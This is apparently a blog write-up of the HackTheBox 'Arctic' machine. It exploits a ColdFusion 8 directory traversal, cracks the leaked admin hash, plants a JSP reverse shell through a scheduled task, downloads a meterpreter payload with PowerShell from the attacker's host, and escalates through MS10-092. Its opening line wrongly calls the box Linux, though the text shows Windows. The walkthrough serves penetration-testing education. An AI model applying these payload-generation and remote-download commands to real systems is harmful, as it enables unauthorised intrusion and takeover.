This is a writeup on Arctic which is a Linux box categorized as easy on HackTheBox, and has Adobe’s ColdFusion as a primary service running on it. The exploitation essentially leverages enumeration and CVEs, namely Adobe ColdFusion – Directory Traversal & MS10_092. Interestingly, it does require us to escalate the user privileges for obtaining the root flag.
Before, we start, I want to let you know that this particular box Arctic on HackTheBox has got some serious latency issue. It took about 20-30 seconds to serve each request, and it sadly kept dying on me. I had to reset it a few times, thus as a result you might notice different IP addresses for the box in the included screenshots and commands.
Arctic Writeup: Scanning Network
Let’s start off by running an obvious nmap scan.
# Nmap 7.70 scan initiated as: nmap -sC -sV -oA nmap.basic 10.129.156.45 Nmap scan report for 10.129.150.85 Host is up (0.16s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
So, the scan has returned with 3 open ports
135, 8500, 49154. Among which, the
135 & 49154 are running basic RPC service. Let’s first explore port
8500 as it seems interesting.
Arctic Writeup: Enumeration
Starting off with the browser view of port
We find two directories, namely
cfdocs. Enumerating further with
We have a plenty of files and directories in here. But,
administrator sounds worthy enough to be explored first 😉
Okay, so we have a login page of “ColdFusion 8” running here, with the username locked to
You can check out this link to learn more about Adobe’s ColdFusion.
I also googled about the changelog for ColdFusion 8 and found out that there was only a single sub-version of version 8 i.e. “ColdFusion v8.0.1“. Thus, we can be sure that we are dealing with ColdFusion v8.0.1 here. It’s always wise to do version enumeration, you never know where it may help you out 😉
I did try a few default passwords like “admin“, “password“, etc. but no luck with them. And I couldn’t afford to brute-fore my way in because this box took freaking 30 seconds to respond to every request.
Arctic Writeup: Exploitation
So, better search for some exploits available for ColdFusion 8
I found this Directory Traversal exploit on ExploitDB
Arctic Writeup: Using the Directory Traversal Exploit
Modifying the URL (as per the instructions in the exploit) –
The exploit did work and reveals a password hash
Password Hash--> password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Analyzing the password hash
Using a hash identifier website I found out that the hash type is SHA1
Further trying a few websites for SHA1 hash decryption I was able to decrypt the password hash using this site
password = happyday
Great! Now, after trying the password obtained, we were logged in as “Administrator“.
Arctic Writeup: Getting a reverse shell
There are a hell lot of things to do here but what’s of use to us is the “Scheduling Tasks” service under the “Debugging & Logging” section, which ColdFusion offers and allows us to upload files.
I will be creating a reverse shell in
jsp using msfvenom, to upload.
It’s because after I took a lil hint from the walkthroughs, I learn that ColdFusion serves and runs
jsp reverse shell using msfvenom (fit in the
LPORT values) –>
┌─[[email protected]]─[~/Desktop/Arctic HTB] └──╼ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=8500 > shell.jsp Payload size: 1500 bytes
Let’s copy this reverse shell file into our apache web server directory i.e. /var/www/html/
┌─[[email protected]]─[~/Desktop/Arctic HTB] └──╼ cp shell.jsp /var/www/html/
and start the apache server on our machine.
┌─[[email protected]]─[~/Desktop/Arctic HTB] └──╼ service apache2 start
Checking the localhost webpage to ensure that we have the file “
Now, let’s schedule a task in ColdFusion to visit this
"shell.jsp” file on our server and do the magic 😉
I will add the URL of our server where the “
shell.jsp” file resides i.e.
http://10.10.14.52/shell.jsp and will also specify the destination path to save the file on the box i.e.
Once, the task is scheduled, Run it !
It will take a while, and then give a message “This scheduled task was completed successfully.“
Verifying that we have successfully uploaded “
shell.jsp” to the CFIDE directory.
shell.jsp is successfully uploaded.
let’s open up the listening port
8500 on our machine (as
8500 was the port we mentioned as
LPORT in the
┌─[[email protected]]─[~/Desktop/Arctic HTB] └──╼ nc -nlvp 8500 listening on [any] 8500 …
Let’s now visit the URL to
"shell.jsp” file on the box
Yay! We have a reverse shell!
Arctic Writeup: User Flag
On running the command “
whoami” we find out that the current user is “tolis“
Voila🎉 We have the user flag. Now we gotta escalate our privileges.
Arctic Writeup: Root Flag
Getting a reverse meterpreter shell
Now, because this is just a reverse shell, let us try getting a meterpreter session on the box
Let’s create a windows reverse meterpreter shell using msfvenom —>
┌─[[email protected]]─[~/Desktop/Arctic HTB] └──╼ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=8500 -f exe > met_shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes
And copy it to the server directory to be able to host this file on the server.
┌─[[email protected]]─[~/Desktop/Arctic HTB] └──╼ cp met_shell.exe /var/www/html/
now let’s run this powershell command in the normal reverse shell we obtainer earlier,
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.52/met_shell.exe','meterpreter.exe')"
So, now we have the “
meterpreter.exe” on the box
Let’s use the “
exploit/multi/handler" on metasploit
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set LHOST 10.10.14.52 LHOST => 10.10.14.52 msf5 exploit(multi/handler) > set LPORT 8500 LPORT => 8500 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.52:8500
Now let’s run the “
meterpreter.exe” file on the box using our current shell.
And there we have our reverse meterpreter shell 🙂
PS– We are running a x86 meterpreter session on a x64 box.
I also tried out the command “
getsystem” to gain root, you know just in case 😉 but it didn’t work lol
Now, lets run the “
local_exploit_suggester". This module basically suggests any exploits that the box is vulnerable against.
meterpreter > Background session 1? [y/N] msf5 exploit(multi/handler) > search suggest Matching Modules # Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- 0 auxiliary/server/icmp_exfil normal No ICMP Exfiltration Service 1 exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free 2 exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow 3 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester 4 post/osx/gather/enum_colloquy normal No OS X Gather Colloquy Enumeration 5 post/osx/manage/sonic_pi normal No OS X Manage Sonic Pi msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf5 post(multi/recon/local_exploit_suggester) > run
OK so we have some interesting results,
Also, because we are running an x86 architecture meterpreter session on an x64 architecture box, we should additionally try to migrate our meterpreter session to an x64 architecture and re-run the “
local_exploit_suggester” module as they may return different results.
Arctic Writeup: Migrating meterpreter shell
So, lets migrate our x86 meterpreter session into an x64 version.
Let’s choose a process with x64 Architecture,
I will be avoiding “
powershell.exe” because using it may cause this process to die, and if “
powershell.exe" dies our meterpreter session dies.
Let’s use “
jrun.exe" with “pid = 1140“
So. now we have successfully migrated into an x64 version meterpreter session. Lets re-run the “
Comparing the two results from x86 session and x64 session, we can deduce that “
exlpoit/windows/local/ms10_092_scelevator” which is ideal for escalating privileges is common to both. Let’s try the exploit “
Awesome! 🥳 We are AUTHORITY\SYSTEM . Here’s the root flag.
Until next box, checkout other intriguing writeups here